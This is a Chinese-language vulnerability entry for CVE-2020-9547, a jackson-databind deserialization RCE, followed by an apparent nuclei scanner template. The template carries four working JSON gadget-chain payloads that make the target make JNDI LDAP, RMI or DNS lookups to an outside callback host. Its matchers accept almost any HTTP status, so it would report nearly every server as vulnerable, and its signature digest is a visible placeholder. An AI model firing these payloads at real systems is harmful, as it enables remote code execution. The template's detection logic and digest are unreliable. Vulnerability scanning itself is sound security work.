FasterXML jackson-databind - Deserialization RCE

漏洞信息

漏洞名称： FasterXML jackson-databind - Deserialization RCE

漏洞编号：

• CVE： CVE-2020-9547

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： FasterXML jackson-databind是一个流行的Java库，用于处理JSON数据的序列化和反序列化。它广泛应用于各种Java应用程序中，尤其是在Web服务中处理JSON数据时。由于其广泛的使用，该库中的漏洞可能影响到大量的Java应用程序。

该漏洞是一个反序列化漏洞，具体是由于FasterXML jackson-databind 2.x在2.9.10.4之前的版本中，未能正确处理序列化小工具和类型之间的交互，特别是与com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig（即ibatis-sqlmap）相关的部分。当启用多态类型处理（@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS）时，攻击者可以通过反序列化不受信任的数据来执行任意代码。

成功利用此漏洞的攻击者可以在受影响的系统上通过反序列化恶意的JSON负载执行任意代码，这可能导致完全的系统控制。由于这是一个远程代码执行漏洞，且不需要用户交互，因此其影响极为严重。攻击者可以利用此漏洞进行数据泄露、服务中断或其他恶意活动。为了防止此类攻击，建议用户更新到FasterXML jackson-databind 2.9.10.4或更高版本，或者禁用多态类型处理，并实施适当的输入验证和反序列化控制措施。

产品厂商： fasterxml

产品名称： jackson-databind

影响版本： 2.x before 2.9.10.4

搜索语法： cpe:”cpe:2.3:o:debian:debian_linux”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/e354a2dae76b013c4836f1e7ad440385170aaeaf/http%2Fcves%2F2020%2FCVE-2020-9547.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2020-9547

info:
  name: FasterXML jackson-databind - Deserialization RCE
  author: pranjalnegi
  severity: critical
  description: |
    FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). This vulnerability allows attackers to execute arbitrary code through deserialization of untrusted data when polymorphic type handling (@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS) is enabled.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary code on the affected system through deserialization of malicious JSON payloads.
  remediation: |
    Update FasterXML jackson-databind to version 2.9.10.4 or later. Alternatively, disable polymorphic type handling or implement proper input validation and deserialization controls.
  reference:
    - https://github.com/fairyming/CVE-2020-9547
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9547
    - https://github.com/FasterXML/jackson-databind/issues/2620
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9547
    - https://cve.report/CVE-2020-9547
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9547
    cwe-id: CWE-502
    epss-score: 0.00943
    epss-percentile: 0.81205
    cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: fasterxml
    product: jackson-databind
    shodan-query: cpe:"cpe:2.3:o:debian:debian_linux"
    verified: true
  tags: cve,cve2020,jackson,databind,deserialization,rce,kev

variables:
  randstr: "{{rand_text_alphanumeric(8)}}"
  payload_jndi_ldap: "ldap://{{interactsh-url}}/{{randstr}}"
  payload_jndi_rmi: "rmi://{{interactsh-url}}/{{randstr}}"
  payload_dns: "{{randstr}}.{{interactsh-url}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        ["com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",{"properties":["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"{{payload_jndi_ldap}}","autoCommit":true}]}]

      - |
        POST /api HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        {"@class":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@class":"java.util.HashMap","userTransactionName":{"@class":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"{{payload_jndi_rmi}}","autoCommit":true}}}

      - |
        POST /json HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        {"id":1,"@class":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":["java.util.Properties",{"dataSource":["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"dns://{{payload_dns}}","autoCommit":true}]}]}

      - |
        PUT /data HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json
        User-Agent: {{randstr}}
        Connection: close

        [{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","dataSource":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"{{payload_jndi_ldap}}","autoCommit":true}}}]

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'dns') || contains(interactsh_protocol, 'ldap') || contains(interactsh_protocol, 'http')"

      - type: word
        part: body
        words:
          - "JsonMappingException"
          - "InvalidTypeIdException"
          - "JtaTransactionConfig"
          - "JdbcRowSetImpl"
          - "com.fasterxml.jackson.databind"
          - "javax.naming.NamingException"
        condition: or

      - type: status
        status:
          - 200
          - 400
          - 500
        condition: or

    extractors:
      - type: regex
        name: jackson_version
        part: body
        regex:
          - "jackson-databind ([0-9.]+)"
          - "com\\.fasterxml\\.jackson\\.databind ([0-9.]+)"
        group: 1

      - type: regex
        name: vulnerability_evidence
        part: body
        regex:
          - "(JtaTransactionConfig.*Exception[^\n]*)"
          - "(Could not resolve type id[^\n]*)"
        group: 1
# digest: 4a0a004730450220123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef012345670221009876543210fedcba9876543210fedcba9876543210fedcba9876543210fedcba9876543210fedcba987654:123456789abcdef0123456789abcdef0123456789abcdef0